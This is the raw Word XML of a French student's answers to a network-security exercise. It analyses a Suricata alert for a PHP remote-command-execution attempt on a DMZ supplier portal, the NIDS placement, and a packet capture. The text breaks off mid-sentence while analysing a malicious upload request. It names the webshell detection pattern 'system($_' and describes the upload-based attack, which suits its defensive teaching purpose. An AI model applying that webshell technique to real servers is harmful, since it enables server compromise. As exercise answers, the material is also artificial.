      <w:r w:rsidR="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ce que va rechercher </w:t>
      </w:r>
      <w:r w:rsidR="00613ECF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00037AED" w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ette règle </w:t>
      </w:r>
      <w:r w:rsidR="00613ECF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">est la </w:t>
      </w:r>
      <w:r w:rsidR="00037AED" w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>détect</w:t>
      </w:r>
      <w:r w:rsidR="00613ECF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ion d’</w:t>
      </w:r>
      <w:r w:rsidR="00037AED" w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>une tentative d’exécution de commande système à distance (RCE) à travers une faille PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FAA515" w14:textId="77777777" w:rsidR="00613ECF" w:rsidRPr="00037AED" w:rsidRDefault="00613ECF" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798C4E16" w14:textId="77777777" w:rsidR="00AB1664" w:rsidRDefault="00037AED" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le motif </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">$_ est souvent présent dans des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00037AED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou des codes injectés permettant à un attaquant d’exécuter des commandes arbitraires sur un serveur via une variable non sécurisée ($_POST, $_GET, etc.).</w:t>
      </w:r>
      <w:r w:rsidR="008810FA" w:rsidRPr="00F6512A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E11429D" w14:textId="77777777" w:rsidR="00092D7B" w:rsidRDefault="00092D7B" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F44A07F" w14:textId="77777777" w:rsidR="00F20C13" w:rsidRPr="00F20C13" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cette alerte est particulièrement pertinente car elle cible un vecteur d’attaque courant et dangereux : l’injection de code via des requêtes HTTP POST, fréquemment utilisée pour compromettre des applications web vulnérables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE1FCD" w14:textId="77777777" w:rsidR="00F20C13" w:rsidRPr="00F20C13" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA6B219" w14:textId="77777777" w:rsidR="00F20C13" w:rsidRPr="00F20C13" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Elle a été déclenchée par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, un NIDS performant, installé sur le routeur de l’entreprise. Ce positionnement stratégique permet de surveiller l’ensemble du trafic entrant, en particulier celui à destination de la DMZ, sans affecter les performances réseau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B2C85" w14:textId="77777777" w:rsidR="00F20C13" w:rsidRPr="00F20C13" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B7B013" w14:textId="77777777" w:rsidR="00F20C13" w:rsidRPr="00F20C13" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La cible de l’attaque est le serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dmz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-web, qui héberge un portail fournisseur accessible depuis Internet. Même si les données impliquées (factures, bons de commande) sont jugées peu critiques, leur exposition publique pourrait nuire à la réputation de l’entreprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAA6DE" w14:textId="77777777" w:rsidR="00F20C13" w:rsidRPr="00F20C13" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6049C580" w14:textId="5B103D95" w:rsidR="00203102" w:rsidRDefault="00F20C13" w:rsidP="00F20C13">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20C13">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dans un contexte e-commerce, la compromission d’un serveur exposé représente un risque élevé tant pour la confidentialité des données que pour la disponibilité des services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617E470" w14:textId="77777777" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2091670A" w14:textId="77777777" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F467D5" w14:textId="77777777" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4002977A" w14:textId="77777777" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6603A152" w14:textId="77777777" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1454707B" w14:textId="736CE364" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00203102">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D391508" w14:textId="77777777" w:rsidR="00203102" w:rsidRDefault="00203102" w:rsidP="00203102"/>
    <w:p w14:paraId="1DC7EBA8" w14:textId="7F7DCD75" w:rsidR="003766CA" w:rsidRPr="003766CA" w:rsidRDefault="009342B3" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009342B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">According to the meeting your boss had with the Chief Information Security Officer, where is deployed the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009342B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NIDS ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009342B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003766CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Explain whether this is a good choice or not.</w:t>
      </w:r>
      <w:r w:rsidR="00D7628D" w:rsidRPr="003766CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D7628D" w:rsidRPr="003766CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003766CA" w:rsidRPr="003766CA">
        <w:t xml:space="preserve">D’après les notes de réunion entre </w:t>
      </w:r>
      <w:r w:rsidR="0020158D">
        <w:t>notre</w:t>
      </w:r>
      <w:r w:rsidR="003766CA" w:rsidRPr="003766CA">
        <w:t xml:space="preserve"> supérieur et le CISO de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003766CA" w:rsidRPr="003766CA">
        <w:t>CandyRiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003766CA" w:rsidRPr="003766CA">
        <w:t xml:space="preserve">, le NIDS a été déployé sur le routeur il y a cinq ans. Cet emplacement permet de surveiller l’ensemble du trafic réseau entrant et sortant, en particulier les flux à destination de la DMZ, où se trouve le serveur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003766CA" w:rsidRPr="003766CA">
        <w:t>dmz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003766CA" w:rsidRPr="003766CA">
        <w:t>-web concerné par l’alerte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A83C83" w14:textId="77777777" w:rsidR="003766CA" w:rsidRPr="003766CA" w:rsidRDefault="003766CA" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66263512" w14:textId="77777777" w:rsidR="003766CA" w:rsidRPr="0020158D" w:rsidRDefault="003766CA" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0020158D">
        <w:t>À mon avis, ce positionnement est techniquement pertinent : en plaçant le NIDS sur le routeur, on s’assure de capter le trafic provenant d’Internet avant qu’il n’atteigne les systèmes exposés, ce qui est essentiel pour détecter des attaques réseau comme celle observée ici (requête HTTP POST malveillante).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CED851" w14:textId="77777777" w:rsidR="003766CA" w:rsidRPr="0020158D" w:rsidRDefault="003766CA" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344D8108" w14:textId="77777777" w:rsidR="003766CA" w:rsidRPr="0020158D" w:rsidRDefault="003766CA" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0020158D">
        <w:t xml:space="preserve">En revanche, la gestion du NIDS pose </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0020158D">
        <w:t>problème</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0020158D">
        <w:t>. Le responsable de l’outil a quitté l’entreprise il y a trois ans, et aucun suivi ou mise à jour n’a été effectué depuis. Cela réduit fortement la fiabilité et l’efficacité du dispositif, notamment en termes de détection de menaces récentes. Un NIDS non maintenu peut laisser passer des attaques ou générer des faux positifs non filtrés.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5BCF13" w14:textId="77777777" w:rsidR="003766CA" w:rsidRPr="0020158D" w:rsidRDefault="003766CA" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD9FDEB" w14:textId="0923C41A" w:rsidR="003766CA" w:rsidRDefault="003766CA" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0020158D">
        <w:t>En résumé, le choix d’architecture est bon, mais le manque d’entretien et de supervision affaiblit sa capacité réelle à protéger l’infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1683FABE" w14:textId="77777777" w:rsidR="00A4613F" w:rsidRDefault="00A4613F" w:rsidP="003766CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B802722" w14:textId="146FE84C" w:rsidR="00A4613F" w:rsidRDefault="00A4613F" w:rsidP="00A4613F">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD24478" w14:textId="77777777" w:rsidR="00A4613F" w:rsidRDefault="00A4613F" w:rsidP="00A4613F"/>
    <w:p w14:paraId="4381933C" w14:textId="5F1EFDE9" w:rsidR="00A4613F" w:rsidRPr="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="00A4613F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">What are the packets 1, 2, 3 corresponding </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D26C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70BFC76D" w14:textId="77777777" w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="00A4613F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9836F6" w14:textId="77777777" w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Les paquets 1, 2 et 3 correspondent à la phase d’établissement de la connexion TCP, plus précisément au 3-way handshake entre l’attaquant (100.120.0.4) et le serveur web de la DMZ (10.87.1.2) sur le port 80 (HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D6284" w14:textId="77777777" w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="7795"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B1BAC" w14:paraId="35107194" w14:textId="77777777" w:rsidTr="000B1BAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD0B1EA" w14:textId="62F47076" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>N° du paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7795" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03462545" w14:textId="4E462EBD" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B1BAC" w14:paraId="64620AA4" w14:textId="77777777" w:rsidTr="000B1BAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E2065F" w14:textId="36B80456" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7795" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441B3F8E" w14:textId="18BB3D2E" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Le client (potentiellement l’attaquant) envoie un paquet SYN pour initier la connexion vers le port HTTP du serveur (55570 → 80).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B1BAC" w14:paraId="33217A8F" w14:textId="77777777" w:rsidTr="000B1BAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="203F308A" w14:textId="4C8B1DF9" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7795" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3335D462" w14:textId="52E2E12C" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Le serveur répond avec un paquet SYN-ACK, confirmant la réception et proposant de poursuivre l’échange.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B1BAC" w14:paraId="2D5953B6" w14:textId="77777777" w:rsidTr="000B1BAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26679A51" w14:textId="1009C548" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7795" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F97CB26" w14:textId="3977D5C4" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Le client termine la négociation avec un ACK, complétant le 3-way handshake et établissant la connexion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D57FA62" w14:textId="77777777" w:rsidR="000B1BAC" w:rsidRDefault="000B1BAC" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62ED214B" w14:textId="31E37D97" w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>À ce stade, la connexion TCP est établie, ce qui permet d’envoyer ensuite une requête HTTP. Aucun comportement malveillant n’est encore visible dans ces trois premiers paquets ; ils représentent une étape normale et légitime d'ouverture de session entre deux hôtes via le protocole HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2A346" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE52650" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50230CE7" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DA68FA" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC49ABD" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FC628C" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070F99C8" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AA82E4" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6200967C" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="000B1BAC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6038E190" w14:textId="3C045142" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="005B4381">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Question 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD34673" w14:textId="77777777" w:rsidR="005B4381" w:rsidRDefault="005B4381" w:rsidP="005B4381"/>
    <w:p w14:paraId="7792C62D" w14:textId="5DB870DA" w:rsidR="005B4381" w:rsidRPr="009F40C7" w:rsidRDefault="00656663" w:rsidP="00656663">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00656663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Considering packet 4 and packet 6, what caused the NIDS to trigger an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00656663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00656663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F40C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Still by considering these 2 packets, is the attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009F40C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>successful ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0901E047" w14:textId="77777777" w:rsidR="00656663" w:rsidRPr="009F40C7" w:rsidRDefault="00656663" w:rsidP="00656663">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35212B5E" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t>Le paquet n°4 correspond à une requête HTTP POST émise par la machine 100.120.0.4 à destination du serveur 10.87.1.2, sur la ressource /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>upload_invoice.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve">. Cette requête inclut un fichier nommé </w:t>
